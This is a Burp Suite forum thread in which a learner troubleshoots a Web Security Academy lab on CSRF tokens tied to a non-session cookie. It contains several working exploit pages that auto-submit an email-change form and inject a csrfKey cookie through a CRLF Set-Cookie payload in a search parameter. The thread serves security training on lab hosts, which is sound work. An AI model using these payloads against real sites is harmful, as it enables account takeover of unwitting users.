Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab: CSRF where token is tied to non-session cookie

rmotta | Last updated: Aug 15, 2024 11:46AM UTC

Hello! I'm stuck in this lab... i already followed the sollution from burp and commutiy as have in the lab but i always get ""Invalid CSRF token"" Maybe there is a bug in this lab? I'm trying to exploit "wiener" using "carlos" tokens but its not working Here is my exploit <html> <body> <form method="POST" action="https://0a2e009404999fd4800b0920006a00de.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="cccc%40f"/> <input type="hidden" name="csrf" value="HiEQquPVnTfsVCUTDoPp1mCT7pkQDJ48"/> <input type="submit" value="Submit"> </form> <img src="https://0a2e009404999fd4800b0920006a00de.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=b7IrmhuKXoM3v8Z8G0SdyYHgCN3gCtKP%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> <html> wiener csrf= HiEQquPVnTfsVCUTDoPp1mCT7pkQDJ48 csrfKey cookie= iIvVbgZhPWlx6E6Jqyt483YAny00nmpW Carlos csrf= ZJc6Qqx1QiDPzbamsKfYRtQ8WI0Y58sJ csrfKey cookie= b7IrmhuKXoM3v8Z8G0SdyYHgCN3gCtKP Can i have a help?

Ben, PortSwigger Agent | Last updated: Aug 16, 2024 07:01AM UTC

Hi, Having just run through this particular lab I was able to solve it using the written solution provided so it is working as expected. Looking at your exploit, you need to use your CSRF token and your CSRF Key value in your exploit.

rmotta | Last updated: Aug 19, 2024 11:49AM UTC

I'm trying almost 1 week in this lab... I'm really needing help Exploit---- <html> <body> <form method="POST" action="https://0aa100fe04e8804c810c521d00c000a9.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="cccce%40f.com"/> <input type="hidden" name="csrf" value="69n2Euu9pGKj9Hgk6JrH2nY76Hvn53ji"/> <input type="submit" value="Submit"> </form> <img src="https://0aa100fe04e8804c810c521d00c000a9.web-security-academy.net/?search=testa%0d%0aSet-Cookie:%20csrfKey=PBNFODu9HZm3xo2wNFX1FyfUlg3ybj5e%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> <html> ----- Viewer(victim) csrf: CJaFXWx9obzTqTK7ik3gqsZQsSoIJbKB csrfKey cookie: BnPFgIiGm2ykpiyVUTehyUlwZiDkTtiP Carlos(attacker) csrf= 69n2Euu9pGKj9Hgk6JrH2nY76Hvn53ji csrfKey cookie= PBNFODu9HZm3xo2wNFX1FyfUlg3ybj5e

rmotta | Last updated: Aug 19, 2024 11:50AM UTC

Its still saying: "Invalid CSRF token"

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 12:26PM UTC

Hi, Just to clarify - your user is the 'wiener' user and you are delivering your exploit to the 'carlos' user.

rmotta | Last updated: Aug 20, 2024 11:41AM UTC

I'm logged into the wiener account them i go to exploit server them craft exploit like mencioned before using the "carlos" token and cookie... them i click "view exploit" and i got message: "Invalid CSRF token" I tested these tokens direct into burp and its works

rmotta | Last updated: Aug 20, 2024 11:50AM UTC

Bro, finally i finished but have anything wrong in the payload because i were reading the forum answers from other users and i tested other payload and it works " <html> <body> <form method="POST" action="https://0aa800ce0356ad7680266786004700ad.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="pwneda1321@evil-user.net" /> <input type="hidden" name="csrf" value="JigFVu1ixnm73M9ay1eMAvMK5Kh8faTB" /> <input type="submit" name="Submit request" /> </form> <img src="https://0aa800ce0356ad7680266786004700ad.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=bPT1E8Qu1AvEkai77WMRyplTDeo7vrW7%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html> " Thanks for help!

whiteTea | Last updated: Sep 29, 2024 01:00PM UTC

No, neither solution works. And I'm a little surprised that you're asking if Rmotta sent the exploit to Carlos. Carlos is just an account to help us identify the case where the token is bound to a non-session cookie. That's why we have the credentials of wiener and carlos to test it. This is not the first time that the labs have not worked. Support has suggested that there may be issues with the victim browser. In this lab I tried my solution, the solution given by portswigger and the youtube solution. None of them worked. I had solved this lab several times before. Like I said, many, many exercises on portswigger have not worked properly lately. In the beginning it was fine for me because the exercises are free. But now it's very frustrating because I want to prepare for the BURP certification. But in reality, it's not possible to train when it feels like every 4th lab is broken (very annoying, especially with the mystic labs) and I wonder if I made a mistake myself or got another broken lab. Of course I don't blame you Support for this and this is not meant to be taken as an attack. I know you are doing your best, but perhaps you can pass on the frustration of the customers to your management. Best regards, whitetea

Ben, PortSwigger Agent | Last updated: Sep 30, 2024 10:24AM UTC

Hi, I was trying to make sure that the correct csrf and csrfKey values were being used in the exploit that was delivered. We are still experiencing some intermittent issues with the labs - these have proved difficult to diagnose because of the transient nature of them. The team are, however, once again, looking into this. Having said the above, I have just run through this lab, as of right now, and been able to solve it using the solution provided.

Matthew | Last updated: Oct 02, 2024 12:08PM UTC

Well just eyeballing the first attempt, it looks like you mixed the csrf token and csrf key across accounts, so since they are not tied together it will not work.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.